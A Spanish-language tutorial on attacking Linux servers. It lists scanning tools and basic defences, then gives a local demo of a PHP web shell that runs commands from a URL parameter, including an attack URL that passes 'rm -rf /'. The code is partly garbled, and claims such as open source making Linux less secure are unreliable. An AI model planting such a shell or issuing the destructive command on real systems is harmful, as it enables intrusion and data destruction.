Hackeando el sistema operativo Linux: Hackeando con Ubuntu (Tutorial de Comandos)

Linux es el sistema operativo de servidor más utilizado, especialmente para servidores web. Es de código abierto; esto significa que cualquiera puede tener acceso al código fuente. Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades. Linux para Hackers trata de explotar estas vulnerabilidades para obtener acceso no autorizado a un sistema.

En este artículo, te presentaremos lo que es Linux, sus vulnerabilidades de seguridad, la piratería con Ubuntu y las contramedidas que puedes poner en práctica.

Temas tratados en este tutorial

  • Nota rápida sobre Linux
  • Herramientas de hackeo de Linux
  • Cómo prevenir los hackeos de Linux
  • Actividad de hackeo: Hackear un sistema Linux usando PHP

Nota rápida sobre Linux

Linux es un sistema operativo de código abierto. Hay muchas distribuciones de sistemas operativos basados en Linux como Redhat, Fedora y Ubuntu, etc. A diferencia de otros sistemas operativos, Linux es menos seguro cuando se trata de la seguridad. Esto se debe a que el código fuente está disponible libremente, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlas en comparación con otros sistemas operativos que no son de código abierto. Linux puede ser utilizado como un servidor, un escritorio, una tableta o un sistema operativo para dispositivos móviles.

Los programas de Linux pueden ser operados utilizando la GUI o los comandos. Los comandos de Linux para la piratería de Kali Linux son más eficaces y eficientes en comparación con el uso de la GUI. Por esta razón, ayuda a conocer los comandos básicos de Linux para el hacking.

Consulte estos tutoriales https://www.guru99.com/unix-linux-tutorial.html sobre cómo empezar a hackear Kali Linux.

Herramientas para hackear Linux

  • Nessus- esta herramienta se puede utilizar para hackear Ubuntu, escanear los ajustes de configuración, parches y redes, etc. se puede encontrar en https://www.tenable.com/products/nessus
  • NMap. Esta herramienta se puede utilizar para supervisar los hosts que se ejecutan en el servidor y los servicios que están utilizando. También se puede utilizar para escanear puertos. Se puede encontrar en https://nmap.org/
  • SARA – SARA es el acrónimo de Asistente de Investigación del Auditor de Seguridad. Como su nombre indica, esta herramienta se puede utilizar para auditar las redes contra amenazas como SQL Injection, XSS, etc. Se puede encontrar en http://www-arc.com/sara/sara.html

La lista anterior no es exhaustiva; le da una idea de las herramientas disponibles para el hacking de Ubuntu y el hacking de sistemas Linux.

Cómo prevenir los hacks de Linux

El hacking de Linux se aprovecha de las vulnerabilidades del sistema operativo. Una organización puede adoptar la siguiente política para protegerse de estos ataques.

  • Gestión de parches: los parches corrigen los errores que los atacantes aprovechan para comprometer un sistema. Una buena política de gestión de parches garantizará que se apliquen constantemente los parches pertinentes al sistema.
  • Configuración adecuada del SO- otros exploits se aprovechan de las debilidades en la configuración del servidor. Los nombres de usuario y demonios inactivos deben ser desactivados. Las configuraciones por defecto, como las contraseñas comunes a la aplicación, los nombres de usuario por defecto y algunos números de puerto deben ser cambiados.
  • Sistema de Detección de Intrusos- tales herramientas pueden ser utilizadas para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir tales ataques.

Actividad de Hacking: Hackear un sistema Linux Ubuntu usando PHP

En este escenario práctico, vamos a aprender a hackear con Ubuntu y le proporcionaremos información básica sobre cómo se puede utilizar PHP para comprometer un Linux. No vamos a apuntar a ninguna víctima. Si quieres probarlo, puedes instalar LAMPP en tu máquina local.

PHP viene con dos funciones que pueden ser usadas para ejecutar comandos de hacking en Linux. Tiene las funciones exec() y shell_exec(). La función exec() devuelve la última línea de la salida del comando mientras que shell_exec() devuelve todo el resultado del comando como una cadena.

Para fines de demostración, supongamos que los administradores del atacante para subir el siguiente archivo en un servidor web.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

AQUÍ,

El script anterior obtiene el comando de la variable GET llamada cmd. El comando se ejecuta usando shell_exec() y los resultados se devuelven en el navegador.

El código anterior puede ser explotado usando la siguiente URL

http://localhost/cp/konsole.php?cmd=ls%20-l

AQUÍ,

  • «…konsole.php?cmd=ls%20-l «asigna el valor ls -l a la variable cmd.

El comando en Ubuntu para hackear contra el servidor se ejecutará como

shell_exec('ls -l') ;

Ejecutando el código anterior en un servidor web se obtienen resultados similares a los siguientes.

El comando anterior simplemente muestra los archivos en el directorio actual y los permisos

Supongamos que el atacante pasa el siguiente comando

rm -rf /

AQUÍ,

  • «rm» elimina los archivos
  • «rf» hace que el comando rm se ejecute en modo recursivo. Borra todas las carpetas y archivos
  • «/» indica al comando que empiece a borrar los archivos del directorio raíz

La URL del ataque sería algo así

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Resumen

  • Linux es un popular sistema operativo para servidores, ordenadores de sobremesa, tabletas y dispositivos móviles.
  • Linux es de código abierto, y el código fuente puede ser obtenido por cualquiera. Esto hace que sea fácil detectar las vulnerabilidades. Es uno de los mejores sistemas operativos para los hackers.
  • Los comandos de hacking básicos y de red en Ubuntu son valiosos para los hackers de Linux.
  • Las vulnerabilidades son una debilidad que puede ser explotada para comprometer un sistema.
  • Una buena seguridad puede ayudar a proteger un sistema de ser comprometido por un atacante.

Deja una respuesta

Tu dirección de correo electrónico no será publicada.